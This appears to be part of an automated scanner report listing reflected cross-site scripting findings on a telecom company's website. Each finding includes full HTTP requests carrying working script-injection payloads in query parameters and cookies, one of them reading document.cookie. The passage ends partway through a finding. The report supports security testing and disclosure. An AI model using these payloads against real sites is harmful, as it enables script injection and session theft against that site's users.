Host:	http://www22.verizon.com
Path:	/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx

Issue detail

The value of the _nfpb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fab1'-alert(1)-'1b99529095f was submitted in the _nfpb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?_nfpb=true6fab1'-alert(1)-'1b99529095f&_pageLabel=vzc_help_announcement&id=perks&CMP=DMC-CVD_ZZ_ZZ_Z_DO_N_X004 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.verizon.com/value
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; BusinessUnit=business; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; WT_FPC=id=2b7981012e2b18a022b1292201505722:lv=1292201657068:ss=1292201505722; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA12V
Content-Type: text/html; charset=utf-8
Expires: Mon, 13 Dec 2010 01:25:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:25:00 GMT
Connection: close
Set-Cookie: RegistrationApp=SessionId=bb3229ce-4f6f-4b07-be91-fe279c3a5846; domain=.verizon.com; path=/
Set-Cookie: VZGEO=west; domain=.verizon.com; path=/
Set-Cookie: NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6cd45525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Mon, 13-Dec-2010 01:30:00 GMT; path=/foryourhome/myaccount/; domain=verizon.com
Content-Length: 131502

<SCRIPT language=javascript>function checkforempty()
           {

               var frm = document.formLogin;
               uid = frm.UserId.value;
               pass = frm.Password.value;

               if ( uid.length =
...[SNIP]...
<script language="javascript" type="text/javascript">

var pageUrl = 'http://www22.verizon.com:80/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?_nfpb=true6fab1'-alert(1)-'1b99529095f&_pageLabel=vzc_help_announcement&id=perks&CMP=DMC-CVD_ZZ_ZZ_Z_DO_N_X004';
if (pageUrl.indexOf('err=') != -1) {
openPopup('User Message(s)', document.all ? 453 : 453, 'PsswdMismat
...[SNIP]...

1.24. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [_pageLabel parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb2d9'-alert(1)-'7ad1a23a5ed was submitted in the _pageLabel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?_nfpb=true&_pageLabel=vzc_help_announcementbb2d9'-alert(1)-'7ad1a23a5ed&id=perks&CMP=DMC-CVD_ZZ_ZZ_Z_DO_N_X004 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.verizon.com/value
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; BusinessUnit=business; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; WT_FPC=id=2b7981012e2b18a022b1292201505722:lv=1292201657068:ss=1292201505722; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: 03A01V
Content-Type: text/html; charset=utf-8
Expires: Mon, 13 Dec 2010 01:25:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:25:02 GMT
Connection: close
Set-Cookie: RegistrationApp=SessionId=13fa2fca-40f9-48b9-a449-baa2f1cd1be4; domain=.verizon.com; path=/
Set-Cookie: VZGEO=west; domain=.verizon.com; path=/
Set-Cookie: NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6bc45525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Mon, 13-Dec-2010 01:30:02 GMT; path=/foryourhome/myaccount/; domain=verizon.com
Content-Length: 131502

<SCRIPT language=javascript>function checkforempty()
           {

               var frm = document.formLogin;
               uid = frm.UserId.value;
               pass = frm.Password.value;

               if ( uid.length =
...[SNIP]...
="javascript" type="text/javascript">

var pageUrl = 'http://www22.verizon.com:80/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?_nfpb=true&_pageLabel=vzc_help_announcementbb2d9'-alert(1)-'7ad1a23a5ed&id=perks&CMP=DMC-CVD_ZZ_ZZ_Z_DO_N_X004';
if (pageUrl.indexOf('err=') != -1) {
openPopup('User Message(s)', document.all ? 453 : 453, 'PsswdMismatch');
document.getEl
...[SNIP]...

1.25. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adbc9'-alert(1)-'c839688eda3 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?_nfpb=true&_pageLabel=vzc_help_announcement&id=perksadbc9'-alert(1)-'c839688eda3&CMP=DMC-CVD_ZZ_ZZ_Z_DO_N_X004 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.verizon.com/value
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; BusinessUnit=business; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; WT_FPC=id=2b7981012e2b18a022b1292201505722:lv=1292201657068:ss=1292201505722; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA15V
Content-Type: text/html; charset=utf-8
Expires: Mon, 13 Dec 2010 01:25:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:25:02 GMT
Connection: close
Set-Cookie: RegistrationApp=SessionId=428f74ab-9687-4da4-84ad-778c6fd92c9e; domain=.verizon.com; path=/
Set-Cookie: VZGEO=west; domain=.verizon.com; path=/
Set-Cookie: NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ce45525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Mon, 13-Dec-2010 01:30:02 GMT; path=/foryourhome/myaccount/; domain=verizon.com
Content-Length: 131502

<SCRIPT language=javascript>function checkforempty()
           {

               var frm = document.formLogin;
               uid = frm.UserId.value;
               pass = frm.Password.value;

               if ( uid.length =
...[SNIP]...
ipt" type="text/javascript">

var pageUrl = 'http://www22.verizon.com:80/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?_nfpb=true&_pageLabel=vzc_help_announcement&id=perksadbc9'-alert(1)-'c839688eda3&CMP=DMC-CVD_ZZ_ZZ_Z_DO_N_X004';
if (pageUrl.indexOf('err=') != -1) {
openPopup('User Message(s)', document.all ? 453 : 453, 'PsswdMismatch');
document.getElementById
...[SNIP]...

1.26. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87ae7'-alert(1)-'07cbc66b566 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?87ae7'-alert(1)-'07cbc66b566=1 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; ASP.NET_SessionId=y0dhtevok4wp3q555bgrlq45; canigetfios=Y; showpromo=Y; BusinessUnit=business; ASPSESSIONIDSSSCQRRB=BOCIPHNDBILEDOLNLLENIOIM; WT_FPC=id=2b7981012e2b18a022b1292201505722:lv=1292201505722:ss=1292201505722; ContextInfo_ZipCode=-; ContextInfo_LoginStatus=LoggedOut; BTagRequired=N; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f045525d5f4f58455e445a4a423660; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/Bundles/Landing/FlexView/FlexView#; CP=null*; RVServiceLocation=TX

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: 03A02V
Content-Type: text/html; charset=utf-8
Expires: Mon, 13 Dec 2010 01:05:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:05:04 GMT
Connection: close
Set-Cookie: RegistrationApp=SessionId=064e9358-bc1e-4518-82fe-7b689df6838c; domain=.verizon.com; path=/
Set-Cookie: VZGEO=west; domain=.verizon.com; path=/
Set-Cookie: NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6bf45525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Mon, 13-Dec-2010 01:10:04 GMT; path=/foryourhome/myaccount/; domain=verizon.com
Content-Length: 131422

<SCRIPT language=javascript>function checkforempty()
           {

               var frm = document.formLogin;
               uid = frm.UserId.value;
               pass = frm.Password.value;

               if ( uid.length =
...[SNIP]...
<script language="javascript" type="text/javascript">

var pageUrl = 'http://www22.verizon.com:80/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?87ae7'-alert(1)-'07cbc66b566=1';
if (pageUrl.indexOf('err=') != -1) {
openPopup('User Message(s)', document.all ? 453 : 453, 'PsswdMismatch');
document.getElementById('PopOK').focus();

...[SNIP]...

1.27. http://www22.verizon.com/residentialhelp/globalheaderhelp.aspx [appname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/globalheaderhelp.aspx

Issue detail

The value of the appname request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3349a'><script>alert(1)</script>3ccb98b37db was submitted in the appname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /residentialhelp/globalheaderhelp.aspx?ignoreHelpnet=y&appname=help-net3349a'><script>alert(1)</script>3ccb98b37db HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 265493
Expires: Mon, 13 Dec 2010 01:01:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:01:43 GMT
Connection: close

<headtags><script language='javascript'>var GlobalHeaderId='GlobalHeader';</script>
<script>var masterClientID ='GlobalHeader';</script>
<script language='javascript' src='/content/commonfiles/include
...[SNIP]...
<input type='hidden' id='hdn_appdet' value='help-net3349a'><script>alert(1)</script>3ccb98b37db' />
...[SNIP]...

1.28. https://www22.verizon.com/ForYourHome/FTTPRepair/vziha/ihamain.aspx [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForYourHome/FTTPRepair/vziha/ihamain.aspx

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93361"><script>alert(1)</script>9f84879edcc was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForYourHome/FTTPRepair/vziha/ihamain.aspx?keyword=WebVoiceMail93361"><script>alert(1)</script>9f84879edcc HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2407
Expires: Mon, 13 Dec 2010 00:45:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:45:23 GMT
Connection: close

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>VZ In Home Agent</title>
<link rel="stylesheet" href="./hnm/css/isupport.css" type="text/css" />
<link rel="stylesheet" h
...[SNIP]...
<input type="hidden" name="my1stKeyWord" id="my1stKeyWord" value="WebVoiceMail93361"><script>alert(1)</script>9f84879edcc"/>
...[SNIP]...

1.29. http://www22.verizon.com/Content/CommonTemplates/Templates/HighSpeedInternet/CheckAvailablity.aspx [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/CommonTemplates/Templates/HighSpeedInternet/CheckAvailablity.aspx

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5af67'><script>alert(1)</script>6f3f42e6a75 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/CommonTemplates/Templates/HighSpeedInternet/CheckAvailablity.aspx?NRMODE=Published&NRNODEGUID=%7b495BE2BD-6BF8-4707-9AD0-F5778C99827F%7d&NRORIGINALURL=%2fResidential%2fHighSpeedInternet%2fCheckAvailability%2fCheckAvailability%2ehtm&NRCACHEHINT=ModifyGuest HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX5af67'><script>alert(1)</script>6f3f42e6a75; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63088
Expires: Mon, 13 Dec 2010 00:47:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:47:11 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:47:11 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:47:11 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:47:11 GMT; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX5AF67'><SCRIPT>ALERT(1)</SCRIPT>6F3F42E6A75 ' />
...[SNIP]...

1.30. http://www22.verizon.com/Content/LearnShop/Templates/AboutFiOS/Overview.aspx [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/LearnShop/Templates/AboutFiOS/Overview.aspx

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7d22e'><script>alert(1)</script>ee37c433e93 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/LearnShop/Templates/AboutFiOS/Overview.aspx?NRMODE=Published&NRNODEGUID=%7bF9227CB3-4C5B-4F37-BD11-4F487E059674%7d&NRORIGINALURL=%2fResidential%2faboutFiOS%2fOverview%2ehtm&NRCACHEHINT=ModifyGuest HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX7d22e'><script>alert(1)</script>ee37c433e93; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71008
Expires: Mon, 13 Dec 2010 00:53:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:53:23 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:53:23 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:23 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:23 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:23 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX7D22E'><SCRIPT>ALERT(1)</SCRIPT>EE37C433E93 ' />
...[SNIP]...

1.31. http://www22.verizon.com/Content/LearnShop/Templates/AboutFiOS/Overview.aspx [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/LearnShop/Templates/AboutFiOS/Overview.aspx

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload f320b<script>alert(1)</script>728ba6e3783 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/LearnShop/Templates/AboutFiOS/Overview.aspx?NRMODE=Published&NRNODEGUID=%7bF9227CB3-4C5B-4F37-BD11-4F487E059674%7d&NRORIGINALURL=%2fResidential%2faboutFiOS%2fOverview%2ehtm&NRCACHEHINT=ModifyGuest HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXf320b<script>alert(1)</script>728ba6e3783; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71004
Expires: Mon, 13 Dec 2010 00:53:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:53:27 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:53:27 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:27 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:27 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:27 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXF320B<SCRIPT>ALERT(1)</SCRIPT>728BA6E3783 </DIV>
...[SNIP]...

1.32. http://www22.verizon.com/Content/LearnShop/Templates/Bundles/Overview.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/LearnShop/Templates/Bundles/Overview.aspx

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 3915f<script>alert(1)</script>d024ec56917 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/LearnShop/Templates/Bundles/Overview.aspx?NRMODE=Published&NRNODEGUID=%7b0ECAE15E-8F92-465E-B27B-6897F0CAB2C4%7d&NRORIGINALURL=%2fresidential%2fbundles%2foverview&NRCACHEHINT=ModifyGuest HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX3915f<script>alert(1)</script>d024ec56917; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 121031
